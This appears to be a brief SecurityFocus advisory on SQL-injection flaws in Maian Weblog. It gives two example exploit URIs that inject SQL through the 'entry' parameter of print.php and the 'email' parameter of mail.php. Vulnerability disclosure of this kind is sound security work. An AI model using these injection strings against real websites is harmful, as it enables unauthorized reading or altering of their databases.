Maian Weblog Multiple SQL-Injection Vulnerabilities

This issue can be exploited through a web client.

The following example URIs are available:

http://www.example.com/print.php?cmd=log&entry=999'% 20union%20select% 201,2,3,4,5, 6/*

http://www.example.com/mail.php? cmd=remove&email=111' or 1/*


 

Privacy Statement
Copyright 2010, SecurityFocus